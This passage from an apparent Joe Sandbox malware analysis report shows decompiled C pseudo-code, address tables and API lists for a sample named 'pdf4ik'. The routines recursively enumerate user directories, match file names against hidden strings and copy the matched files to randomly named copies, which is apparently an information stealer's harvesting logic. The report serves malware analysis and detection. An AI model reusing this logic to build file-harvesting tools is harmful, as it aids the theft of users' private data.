				_t81 =  *0x29dd82ec; // 0x0
				if(_t81 != 0) {
					__eflags =  *_t81 - 2;
					if( *_t81 == 2) {
						_t88 = _t102;
						 *0x29dd8814 = _t45;
					} else {
						 *0x29dd8814 = 0x80000;
					}
				} else {
					 *0x29dd8814 = 0x10000;
				}
				goto L12;
			}


































                                        0x29d8f3e0
                                        0x29d8f3e3
                                        0x29d8f3e5
                                        0x29d8f3f0
                                        0x29d8f3f7
                                        0x29d8f3fc
                                        0x29d8f3fe
                                        0x29d8f402
                                        0x29d8f403
                                        0x29d8f407
                                        0x29d8f414
                                        0x29d8f429
                                        0x29d8f43b
                                        0x29d8f441
                                        0x29d8f44b
                                        0x29d8f458
                                        0x29d8f45a
                                        0x29d8f463
                                        0x29d8f607
                                        0x29d8f60b
                                        0x29d8f610
                                        0x29d8f611
                                        0x29d8f616
                                        0x29d8f61c
                                        0x29d8f624
                                        0x29d8f625
                                        0x29d8f633
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8f469
                                        0x29d8f469
                                        0x29d8f469
                                        0x29d8f474
                                        0x29d8f47d
                                        0x00000000
                                        0x00000000
                                        0x29d8f48f
                                        0x29d8f495
                                        0x29d8f497
                                        0x29d8f4b1
                                        0x29d8f4c5
                                        0x29d8f4ca
                                        0x29d8f4da
                                        0x29d8f4e7
                                        0x29d8f4ec
                                        0x29d8f4f6
                                        0x29d8f4fb
                                        0x29d8f4fe
                                        0x29d8f503
                                        0x29d8f503
                                        0x29d8f508
                                        0x29d8f510
                                        0x29d8f511
                                        0x29d8f518
                                        0x29d8f51e
                                        0x29d8f521
                                        0x29d8f521
                                        0x29d8f52c
                                        0x29d8f530
                                        0x29d8f546
                                        0x29d8f559
                                        0x29d8f55e
                                        0x29d8f568
                                        0x29d8f56e
                                        0x29d8f56e
                                        0x29d8f574
                                        0x29d8f582
                                        0x29d8f58b
                                        0x29d8f596
                                        0x29d8f59f
                                        0x29d8f5a4
                                        0x29d8f5a9
                                        0x29d8f5b4
                                        0x29d8f5ba
                                        0x29d8f5c1
                                        0x29d8f5c7
                                        0x29d8f5cf
                                        0x29d8f5dd
                                        0x29d8f5e0
                                        0x29d8f5fb
                                        0x29d8f602
                                        0x29d8f5e2
                                        0x29d8f5e2
                                        0x29d8f5e2
                                        0x29d8f5d1
                                        0x29d8f5d1
                                        0x29d8f5d1
                                        0x00000000

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F,D9555F04), ref: 29D8F41B
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D8F422
                                        • wsprintfA.USER32 ref: 29D8F43B
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D8F452
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D8F475
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D8F48F
                                        • wsprintfA.USER32 ref: 29D8F4B1
                                        • _memset.LIBCMT ref: 29D8F4C5
                                        • lstrcatA.KERNEL32(?,015A1F98), ref: 29D8F4DA
                                        • _malloc.LIBCMT ref: 29D8F4E2
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D8F4EF
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D8F503
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D8F518
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D8F530
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D8F546
                                        • DeleteFileA.KERNEL32(?), ref: 29D8F568
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 29D8F57C
                                        • FindClose.KERNEL32(00000000), ref: 29D8F58B
                                        • _memset.LIBCMT ref: 29D8F59F
                                        • lstrcatA.KERNEL32(?,015A4228), ref: 29D8F5B4
                                        • lstrlenA.KERNEL32(?), ref: 29D8F5C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$FindHeaplstrcatwsprintf$__getptd_memset$AllocAllocateCloseCopyCountDeleteFirstNextProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$%s\%s$%s\*
                                        • API String ID: 1982528250-59778494
                                        • Opcode ID: e8f338bdec66c821874a02e497d3d863e27ac9826f1e34a89c902a7a27a2ae5d
                                        • Instruction ID: 7b6c7bbf36baf75bcf3c26c38a6c484b9b1050a7adaad78cfadaed322864ff39
                                        • Opcode Fuzzy Hash: e8f338bdec66c821874a02e497d3d863e27ac9826f1e34a89c902a7a27a2ae5d
                                        • Instruction Fuzzy Hash: 4851B0B2940254ABD711EFA4DC49FDA7778EF58B01F0081ADE50A93140EB389A46EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9B520 Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 302fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E29D9B520(intOrPtr __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, CHAR* _a28, intOrPtr _a32) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v804;
				char _v1068;
				struct _WIN32_FIND_DATAA _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				CHAR* _v1400;
				CHAR* _v1404;
				intOrPtr _v1408;
				intOrPtr* _v1412;
				intOrPtr _v1416;
				void* _v1420;
				intOrPtr _v1424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t103;
				intOrPtr _t106;
				int _t109;
				intOrPtr _t119;
				intOrPtr _t123;
				signed int _t128;
				signed char _t129;
				signed int _t130;
				intOrPtr _t131;
				signed int _t132;
				intOrPtr _t144;
				intOrPtr* _t159;
				intOrPtr _t170;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t174;
				intOrPtr _t206;
				intOrPtr _t211;
				CHAR* _t229;
				intOrPtr _t230;
				signed int _t233;
				void* _t234;
				void* _t235;
				void* _t238;

				_t103 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t103 ^ _t233;
				_t159 = _a24;
				_t230 = _a16;
				_t229 = _a12;
				_v1404 = _a4;
				_t106 = _a8;
				_v1416 = _t106;
				_v1396 = __ecx;
				_v1408 = _t230;
				_v1392 = _a20;
				_v1412 = _t159;
				_v1400 = _a28;
				wsprintfA( &_v1068, "%s\\*", _t106);
				_t235 = _t234 + 0xc;
				_t199 =  &_v1068;
				_t109 = FindFirstFileA( &_v1068,  &_v1388);
				_v1420 = _t109;
				_v1424 = 0;
				if(_t109 != 0xffffffff) {
					do {
						_push(".");
						_push( &(_v1388.cFileName));
						if( *0x29dd8550() != 0) {
							_push("..");
							_push( &(_v1388.cFileName));
							if( *0x29dd8550() != 0) {
								wsprintfA( &_v276, "%s\\%s", _v1416,  &(_v1388.cFileName));
								E29DB5640( &_v540, 0, 0x104);
								_t119 =  *0x29dd7a8c; // 0x15a1c40
								_t170 =  *0x29dd8110; // 0x15a5048
								wsprintfA( &_v540, "%s\\%s\\%s\\%s", _v1416,  &(_v1388.cFileName), _t170, _t119);
								E29DB5640( &_v804, 0, 0x104);
								_t123 =  *0x29dd7a8c; // 0x15a1c40
								_t172 =  *0x29dd8110; // 0x15a5048
								wsprintfA( &_v804, "%s\\%s\\%s", _v1416, _t172, _t123);
								_t173 =  *0x29dd7d28; // 0x15a1d88
								_t238 = _t235 + 0x54;
								_push(_t173);
								_push( &(_v1388.cFileName));
								if( *0x29dd8550() != 0) {
									_t206 =  *0x29dd7a8c; // 0x15a1c40
									_t128 =  *0x29dd8550( &(_v1388.cFileName), _t206);
									__eflags = _t128;
									if(_t128 != 0) {
										_t129 = GetFileAttributesA( &_v540);
										__eflags = _t129 - 0xffffffff;
										if(_t129 == 0xffffffff) {
											L14:
											_t174 =  *0x29dd7dcc; // 0x15a4f68
											_t130 =  *0x29dd8550( &(_v1388.cFileName), _t174);
											__eflags = _t130;
											if(_t130 != 0) {
												_t131 =  *0x29dd7b24; // 0x15a1e60
												_t132 =  *0x29dd8550( &(_v1388.cFileName), _t131);
												__eflags = _t132;
												if(_t132 != 0) {
													__eflags = _v1388.dwFileAttributes & 0x00000010;
													if((_v1388.dwFileAttributes & 0x00000010) != 0) {
														goto L23;
													}
												} else {
													_t211 = _v1396;
													__eflags =  *((intOrPtr*)(_t211 + 1)) - _t132;
													if( *((intOrPtr*)(_t211 + 1)) == _t132) {
														goto L18;
													} else {
														E29D99F90(_t229, _t230,  &_v276, _v1404, _v1392, _t159);
														E29D9A320( &_v276, _t229, _t159, _v1404);
														goto L17;
													}
												}
											} else {
												_t144 = _v1396;
												__eflags =  *((char*)(_t144 + 2));
												if( *((char*)(_t144 + 2)) != 0) {
													E29D9A570( &_v276, _t229, _t159, _v1404);
													E29D9A7B0(_t229, _v1412, __eflags,  &_v276, _v1404);
													L17:
													_t230 = _v1408;
													_t159 = _v1412;
												}
												L18:
												_push(_a32);
												_push(_v1400);
												_push(_t159);
												_push(_v1392);
												_push(_t230);
												_push(_t229);
												_push( &_v276);
												_push( &(_v1388.cFileName));
												goto L24;
											}
										} else {
											__eflags = _t129 & 0x00000010;
											if((_t129 & 0x00000010) != 0) {
												goto L14;
											} else {
												E29D99A80(_t230, _v1392,  &_v540,  &(_v1388.cFileName), _t229, _t159);
												_push(_a32);
												_push(_v1400);
												_push(_t159);
												_push(_v1392);
												_push(_t230);
												_push(_t229);
												_push( &_v276);
												_push( &(_v1388.cFileName));
												goto L24;
											}
										}
									} else {
										E29D99A80(_t230, _v1392,  &_v276, _v1404, _t229, _t159);
										L23:
										_push(_a32);
										_push(_v1400);
										_push(_t159);
										_push(_v1392);
										_push(_t230);
										_push(_t229);
										_push( &_v276);
										_push( &(_v1388.cFileName));
										L24:
										E29D9B520(_v1396);
									}
								} else {
									E29D99680( &_v276, _t229, _v1400, _v1404, _t230, _v1392);
									_t232 = _a32;
									if(_a32 != 0 && _v1424 == 0) {
										E29D99A80(_v1408, _v1392,  &_v804, 0x29dcd617, _t229, _t159);
										_v1424 = 1;
									}
									E29D9B520(_v1396,  &(_v1388.cFileName),  &_v276, _t229, _v1408, _v1392, _t159, _v1400, _t232);
									_t230 = _v1408;
								}
								E29DB5640( &_v540, 0, 0x104);
								E29DB5640( &_v804, 0, 0x104);
								_t235 = _t238 + 0x18;
							}
						}
						_t199 = _v1420;
					} while (FindNextFileA(_v1420,  &_v1388) != 0);
					_t109 = FindClose(_v1420);
				}
				return E29DADF46(_t109, _t159, _v8 ^ _t233, _t199, _t229, _t230);
			}













































                                        0x29d9b529
                                        0x29d9b530
                                        0x29d9b53a
                                        0x29d9b53e
                                        0x29d9b542
                                        0x29d9b545
                                        0x29d9b54b
                                        0x29d9b54f
                                        0x29d9b555
                                        0x29d9b56a
                                        0x29d9b570
                                        0x29d9b576
                                        0x29d9b57c
                                        0x29d9b582
                                        0x29d9b588
                                        0x29d9b592
                                        0x29d9b599
                                        0x29d9b59f
                                        0x29d9b5a5
                                        0x29d9b5b2
                                        0x29d9b5c0
                                        0x29d9b5c0
                                        0x29d9b5cb
                                        0x29d9b5d4
                                        0x29d9b5da
                                        0x29d9b5e5
                                        0x29d9b5ee
                                        0x29d9b60e
                                        0x29d9b622
                                        0x29d9b627
                                        0x29d9b62c
                                        0x29d9b651
                                        0x29d9b665
                                        0x29d9b66a
                                        0x29d9b66f
                                        0x29d9b68d
                                        0x29d9b693
                                        0x29d9b699
                                        0x29d9b69c
                                        0x29d9b6a3
                                        0x29d9b6ac
                                        0x29d9b749
                                        0x29d9b757
                                        0x29d9b75d
                                        0x29d9b75f
                                        0x29d9b78a
                                        0x29d9b790
                                        0x29d9b793
                                        0x29d9b7de
                                        0x29d9b7de
                                        0x29d9b7ec
                                        0x29d9b7f2
                                        0x29d9b7f4
                                        0x29d9b863
                                        0x29d9b870
                                        0x29d9b876
                                        0x29d9b878
                                        0x29d9b8bf
                                        0x29d9b8c6
                                        0x00000000
                                        0x00000000
                                        0x29d9b87a
                                        0x29d9b87a
                                        0x29d9b880
                                        0x29d9b883
                                        0x00000000
                                        0x29d9b885
                                        0x29d9b89f
                                        0x29d9b8b5
                                        0x00000000
                                        0x29d9b8b5
                                        0x29d9b883
                                        0x29d9b7f6
                                        0x29d9b7f6
                                        0x29d9b7fc
                                        0x29d9b800
                                        0x29d9b813
                                        0x29d9b82a
                                        0x29d9b82f
                                        0x29d9b82f
                                        0x29d9b835
                                        0x29d9b835
                                        0x29d9b83b
                                        0x29d9b84a
                                        0x29d9b84b
                                        0x29d9b84c
                                        0x29d9b84d
                                        0x29d9b84e
                                        0x29d9b84f
                                        0x29d9b856
                                        0x29d9b85d
                                        0x00000000
                                        0x29d9b85d
                                        0x29d9b795
                                        0x29d9b795
                                        0x29d9b797
                                        0x00000000
                                        0x29d9b799
                                        0x29d9b7b1
                                        0x29d9b7c5
                                        0x29d9b7c6
                                        0x29d9b7c7
                                        0x29d9b7c8
                                        0x29d9b7c9
                                        0x29d9b7ca
                                        0x29d9b7d1
                                        0x29d9b7d8
                                        0x00000000
                                        0x29d9b7d8
                                        0x29d9b797
                                        0x29d9b761
                                        0x29d9b779
                                        0x29d9b8c8
                                        0x29d9b8d7
                                        0x29d9b8d8
                                        0x29d9b8d9
                                        0x29d9b8da
                                        0x29d9b8db
                                        0x29d9b8dc
                                        0x29d9b8e3
                                        0x29d9b8ea
                                        0x29d9b8eb
                                        0x29d9b8f1
                                        0x29d9b8f1
                                        0x29d9b6b2
                                        0x29d9b6cf
                                        0x29d9b6d4
                                        0x29d9b6d9
                                        0x29d9b6fe
                                        0x29d9b703
                                        0x29d9b703
                                        0x29d9b739
                                        0x29d9b73e
                                        0x29d9b73e
                                        0x29d9b904
                                        0x29d9b91a
                                        0x29d9b91f
                                        0x29d9b91f
                                        0x29d9b5ee
                                        0x29d9b922
                                        0x29d9b936
                                        0x29d9b945
                                        0x29d9b945
                                        0x29d9b95b

                                        APIs
                                        • wsprintfA.USER32 ref: 29D9B582
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9B599
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9B5CC
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9B5E6
                                        • wsprintfA.USER32 ref: 29D9B60E
                                        • _memset.LIBCMT ref: 29D9B622
                                        • wsprintfA.USER32 ref: 29D9B651
                                        • _memset.LIBCMT ref: 29D9B665
                                        • wsprintfA.USER32 ref: 29D9B68D
                                        • StrCmpCA.SHLWAPI(?,015A1D88), ref: 29D9B6A4
                                        • StrCmpCA.SHLWAPI(?,015A1C40), ref: 29D9B757
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9B78A
                                          • Part of subcall function 29D99A80: StrCmpCA.SHLWAPI(?,015A1BD0,D9555F04,?,?,?), ref: 29D99ADA
                                          • Part of subcall function 29D99A80: _memset.LIBCMT ref: 29D99B27
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,015A1F98), ref: 29D99B3D
                                          • Part of subcall function 29D99A80: _malloc.LIBCMT ref: 29D99B45
                                          • Part of subcall function 29D99A80: GetTickCount.KERNEL32 ref: 29D99B52
                                          • Part of subcall function 29D99A80: _rand.LIBCMT ref: 29D99B70
                                          • Part of subcall function 29D99A80: wsprintfA.USER32 ref: 29D99B85
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,00000000), ref: 29D99BA2
                                          • Part of subcall function 29D99A80: CopyFileA.KERNEL32(?,?,00000001), ref: 29D99BB8
                                          • Part of subcall function 29D99A80: _memset.LIBCMT ref: 29D99BCC
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D99BE0
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,015A1A80), ref: 29D99BF4
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D99C06
                                          • Part of subcall function 29D99A80: lstrcatA.KERNEL32(?,?), ref: 29D99C14
                                        • StrCmpCA.SHLWAPI(?,015A4F68), ref: 29D9B7EC
                                        • StrCmpCA.SHLWAPI(?,015A1E60), ref: 29D9B870
                                          • Part of subcall function 29D9A570: _memset.LIBCMT ref: 29D9A5A8
                                          • Part of subcall function 29D9A570: lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A5BE
                                          • Part of subcall function 29D9A570: _malloc.LIBCMT ref: 29D9A5C6
                                          • Part of subcall function 29D9A570: GetTickCount.KERNEL32 ref: 29D9A5D3
                                          • Part of subcall function 29D9A570: _rand.LIBCMT ref: 29D9A5E7
                                          • Part of subcall function 29D9A570: wsprintfA.USER32 ref: 29D9A5FC
                                          • Part of subcall function 29D9A570: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 29D9A614
                                          • Part of subcall function 29D9A570: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A624
                                          • Part of subcall function 29D9A570: _memset.LIBCMT ref: 29D9A637
                                          • Part of subcall function 29D9A570: wsprintfA.USER32 ref: 29D9A659
                                          • Part of subcall function 29D9A570: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A6AD
                                          • Part of subcall function 29D9A570: HeapAlloc.KERNEL32(00000000), ref: 29D9A6B4
                                          • Part of subcall function 29D9A7B0: _memset.LIBCMT ref: 29D9A7EC
                                          • Part of subcall function 29D9A7B0: lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A802
                                          • Part of subcall function 29D9A7B0: _malloc.LIBCMT ref: 29D9A80A
                                          • Part of subcall function 29D9A7B0: GetTickCount.KERNEL32 ref: 29D9A817
                                          • Part of subcall function 29D9A7B0: _rand.LIBCMT ref: 29D9A830
                                          • Part of subcall function 29D9A7B0: wsprintfA.USER32 ref: 29D9A845
                                          • Part of subcall function 29D9A7B0: lstrcatA.KERNEL32(?,00000000), ref: 29D9A85D
                                          • Part of subcall function 29D9A7B0: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A86D
                                          • Part of subcall function 29D9A7B0: _memset.LIBCMT ref: 29D9A880
                                          • Part of subcall function 29D9A7B0: wsprintfA.USER32 ref: 29D9A8A2
                                          • Part of subcall function 29D9A7B0: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A8F6
                                          • Part of subcall function 29D9A7B0: HeapAlloc.KERNEL32(00000000), ref: 29D9A8FD
                                        • _memset.LIBCMT ref: 29D9B904
                                        • _memset.LIBCMT ref: 29D9B91A
                                          • Part of subcall function 29D99680: _memset.LIBCMT ref: 29D996D9
                                          • Part of subcall function 29D99680: lstrcatA.KERNEL32(?,015A1F98,D9555F04,?,?), ref: 29D996EF
                                          • Part of subcall function 29D99680: _malloc.LIBCMT ref: 29D996F7
                                          • Part of subcall function 29D99680: GetTickCount.KERNEL32 ref: 29D99704
                                          • Part of subcall function 29D99680: _rand.LIBCMT ref: 29D99718
                                          • Part of subcall function 29D99680: wsprintfA.USER32 ref: 29D9972D
                                          • Part of subcall function 29D99680: lstrcatA.KERNEL32(?,00000000), ref: 29D99745
                                          • Part of subcall function 29D99680: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9975B
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D9B930
                                        • FindClose.KERNEL32(?), ref: 29D9B945
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$wsprintf$File$CopyCountHeapTick_malloc_rand$Find$AllocProcess$AttributesCloseFirstNext
                                        • String ID: %s\%s$%s\%s\%s$%s\%s\%s\%s$%s\*
                                        • API String ID: 517402847-2940171090
                                        • Opcode ID: b9c803dc790fde59809d9a3f2dde3a1565302c5e1f69b237cb331fd2ddac8371
                                        • Instruction ID: 3de38450a327cc6912729c8c4e7eb1f8be4fb6065a5b58520bb0f894a18da2cc
                                        • Opcode Fuzzy Hash: b9c803dc790fde59809d9a3f2dde3a1565302c5e1f69b237cb331fd2ddac8371
                                        • Instruction Fuzzy Hash: A6C12FB6D10518AFDB14EF54DC84EEBB7B9AB48741F4082CDF909A7240DA34AE85DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D958A0 Relevance: 32.1, APIs: 21, Instructions: 589stringfileCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E29D958A0(intOrPtr _a4, intOrPtr _a8, CHAR* _a12, CHAR* _a28, char _a32, CHAR* _a40, CHAR* _a56, char _a60, char _a68, intOrPtr _a88) {
				char _v8;
				char _v16;
				signed int _v24;
				char _v288;
				void* _v1288;
				intOrPtr _v1296;
				struct _SECURITY_ATTRIBUTES* _v1300;
				char _v1316;
				intOrPtr _v1324;
				struct _SECURITY_ATTRIBUTES* _v1328;
				char _v1344;
				char _v1352;
				struct _SECURITY_ATTRIBUTES* _v1356;
				CHAR* _v1372;
				char _v1380;
				intOrPtr _v1384;
				char _v1400;
				intOrPtr _v1408;
				char _v1412;
				char _v1428;
				char _v1436;
				CHAR* _v1440;
				char _v1456;
				char _v1464;
				intOrPtr _v1468;
				char _v1484;
				char _v1492;
				char _v1496;
				short _v1512;
				char _v1520;
				intOrPtr _v1524;
				char _v1540;
				char _v1548;
				intOrPtr _v1552;
				char _v1568;
				char _v1576;
				intOrPtr _v1580;
				char _v1596;
				CHAR* _v1600;
				intOrPtr _v1604;
				CHAR* _v1608;
				CHAR* _v1616;
				CHAR* _v1620;
				CHAR* _v1624;
				char _v1632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t240;
				void* _t244;
				CHAR* _t248;
				void* _t263;
				void* _t265;
				intOrPtr* _t267;
				void* _t270;
				void* _t272;
				void* _t274;
				WCHAR* _t275;
				signed char _t276;
				CHAR* _t291;
				CHAR* _t296;
				void* _t299;
				void* _t301;
				CHAR* _t304;
				void* _t307;
				void* _t309;
				char _t311;
				CHAR* _t314;
				intOrPtr _t329;
				void* _t345;
				signed int _t347;
				CHAR* _t351;
				void* _t352;
				char _t356;
				signed int _t363;
				CHAR* _t368;
				intOrPtr* _t390;
				void* _t402;
				void* _t427;
				CHAR* _t428;
				intOrPtr* _t431;
				void* _t434;
				void* _t437;
				void* _t442;
				void* _t443;
				CHAR* _t444;
				signed int _t450;
				void* _t451;
				void* _t453;
				CHAR* _t454;
				void* _t457;
				void* _t459;
				void* _t460;
				void* _t462;

				_push(0xffffffff);
				_push(E29DC33FE);
				_push( *[fs:0x0]);
				_t233 =  *0x29dd5664; // 0xd9555f04
				_t234 = _t233 ^ _t450;
				_v24 = _t234;
				_push(_t234);
				 *[fs:0x0] =  &_v16;
				_v1604 = _a4;
				_v8 = 0;
				_v1352 = 0xf;
				_v1356 = 0;
				_v1372 = 0;
				_v8 = 3;
				E29DB5640( &_v1288, 0, 0x3e8);
				_t453 = _t451 - 0x650 + 0xc;
				_push( &_v1288);
				_push(0);
				_push(0);
				if(_a8 == 0) {
					_t238 =  *0x29dd8500(0, 0x1a);
					__eflags = _t238;
					_t407 = (0 | _t238 < 0x00000000) - 0x00000001 &  &_v1288;
					__eflags = _t407;
					_t240 = _t407;
					_t20 = _t240 + 1; // 0x0
					_t442 = _t20;
					do {
						_t363 =  *_t240;
						_t240 = _t240 + 1;
						__eflags = _t363;
					} while (_t363 != 0);
					L6:
					E29D892C0( &_v1372, _t407, _t240 - _t442);
					_t408 =  &_v1372;
					_t244 = E29D97CC0( &_v1484,  &_v1372,  &_a12);
					_t454 = _t453 - 0x10;
					_v8 = 4;
					_v1608 = _t454;
					E29D97D80( &_a68, _t454, _t244);
					E29DA4C40( &_v1624, _t467);
					_v8 = 6;
					if(_v1464 >= 0x10) {
						_push(_v1484);
						E29DADF3B();
						_t454 = _t454 + 4;
					}
					_t368 = _v1620;
					_t248 = _v1624;
					_t351 = 0;
					_v1464 = 0xf;
					_v1468 = 0;
					_v1484 = 0;
					_v1608 = _t368;
					_v1600 = _t248;
					if(_t248 == _t368) {
						L71:
						if(_t248 == _t351) {
							L79:
							_v1624 = _t351;
							_v1620 = _t351;
							_v1616 = _t351;
							if(_v1352 >= 0x10) {
								_push(_v1372);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_v1352 = 0xf;
							_v1356 = _t351;
							_v1372 = _t351;
							if(_a32 >= 0x10) {
								_t408 = _a12;
								_push(_a12);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_a32 = 0xf;
							_a28 = _t351;
							_a12 = _t351;
							if(_a60 >= 0x10) {
								_push(_a40);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_a60 = 0xf;
							_a56 = _t351;
							_a40 = _t351;
							if(_a88 >= 0x10) {
								_push(_a68);
								E29DADF3B();
							}
							 *[fs:0x0] = _v16;
							_pop(_t427);
							_pop(_t443);
							_pop(_t352);
							return E29DADF46(0, _t352, _v24 ^ _t450, _t408, _t427, _t443);
						}
						_t428 = _t368;
						_t444 = _t248;
						if(_t248 == _t368) {
							L78:
							_push(_t248);
							E29DADF3B();
							_t454 = _t454 + 4;
							goto L79;
						}
						do {
							if(_t444[0x14] >= 8) {
								_t408 =  *_t444;
								_push( *_t444);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_t444[0x14] = 7;
							_t444[0x10] = _t351;
							 *_t444 = 0;
							_t444 =  &(_t444[0x1c]);
						} while (_t444 != _t428);
						_t248 = _v1624;
						goto L78;
					} else {
						do {
							_v1436 = 7;
							_v1440 = _t351;
							_v1456 = 0;
							E29D97940( &_v1456, _v1600, _t351);
							_v8 = 7;
							_t263 = E29DA48F0( &_v1456,  &_v1540, 0);
							_v8 = 8;
							_t265 = E29D97CC0( &_v1596,  &_v1372,  &_a12);
							_t411 =  &_v1568;
							_v8 = 9;
							_t267 = E29D89980(_t263, _t265,  &_v1568);
							_t457 = _t454 + 0x10;
							_t431 = _t267;
							_v1380 = 0xf;
							_v1384 = 0;
							_v1400 = 0;
							if( &_v1400 != _t431) {
								_v1380 = 0xf;
								_v1384 = 0;
								_v1400 = 0;
								if( *((intOrPtr*)(_t431 + 0x14)) >= 0x10) {
									_t411 =  *_t431;
									_v1400 =  *_t431;
									 *_t431 = 0;
								} else {
									E29DAE1F0( &_v1400, _t431,  *((intOrPtr*)(_t431 + 0x10)) + 1);
									_t457 = _t457 + 0xc;
								}
								_v1384 =  *((intOrPtr*)(_t431 + 0x10));
								_v1380 =  *((intOrPtr*)(_t431 + 0x14));
								 *((intOrPtr*)(_t431 + 0x10)) = 0;
								 *((intOrPtr*)(_t431 + 0x14)) = 0;
							}
							if(_v1548 >= 0x10) {
								_t411 = _v1568;
								_push(_v1568);
								E29DADF3B();
								_t457 = _t457 + 4;
							}
							_v1548 = 0xf;
							_v1552 = 0;
							_v1568 = 0;
							if(_v1576 >= 0x10) {
								_push(_v1596);
								E29DADF3B();
								_t457 = _t457 + 4;
							}
							_v1576 = 0xf;
							_v1580 = 0;
							_v1596 = 0;
							_v8 = 0xe;
							if(_v1520 >= 0x10) {
								_push(_v1540);
								E29DADF3B();
								_t457 = _t457 + 4;
							}
							_v1524 = 0;
							_v1540 = 0;
							_v1520 = 0xf;
							_t270 = E29DA48F0( &_v1456,  &_v1316, _t411);
							_v8 = 0xf;
							_t272 = E29D97CC0( &_v1344,  &_v1372,  &_a12);
							_v8 = 0x10;
							_t274 = E29D89980(_t270, _t272,  &_v1428);
							_t459 = _t457 + 0x10;
							_v8 = 0x11;
							_t275 = E29DA4990(_t274,  &_v1512,  &_v1512);
							if(_t275[0xa] >= 8) {
								_t275 =  *_t275;
							}
							_t276 = GetFileAttributesW(_t275);
							if(_t276 == 0xffffffff || (_t276 & 0x00000010) != 0) {
								_t356 = 0;
								_t434 = 0;
								__eflags = 0;
							} else {
								_t434 = 1;
								_t356 = 0;
							}
							if(_v1492 >= 8) {
								_push(_v1512);
								E29DADF3B();
								_t459 = _t459 + 4;
							}
							_v1492 = 7;
							_v1496 = _t356;
							_v1512 = 0;
							if(_v1408 >= 0x10) {
								_push(_v1428);
								E29DADF3B();
								_t459 = _t459 + 4;
							}
							_v1408 = 0xf;
							_v1412 = _t356;
							_v1428 = _t356;
							if(_v1324 >= 0x10) {
								_push(_v1344);
								E29DADF3B();
								_t459 = _t459 + 4;
							}
							_v8 = 0xe;
							_v1324 = 0xf;
							_v1328 = _t356;
							_v1344 = _t356;
							if(_v1296 >= 0x10) {
								_push(_v1316);
								E29DADF3B();
								_t459 = _t459 + 4;
							}
							_v1296 = 0xf;
							_v1300 = _t356;
							_v1316 = _t356;
							if(_t434 != _t356) {
								_t329 = _v1604;
								 *((intOrPtr*)(_t329 + 0x1c)) =  *((intOrPtr*)(_t329 + 0x1c)) + 1;
								 *0x29dd82f4 =  *0x29dd82f4 +  *((intOrPtr*)(_t329 + 0x1c));
								 *0x29dd82e0 =  *0x29dd82e0 + 1;
							}
							E29DB5640( &_v288, _t356, 0x104);
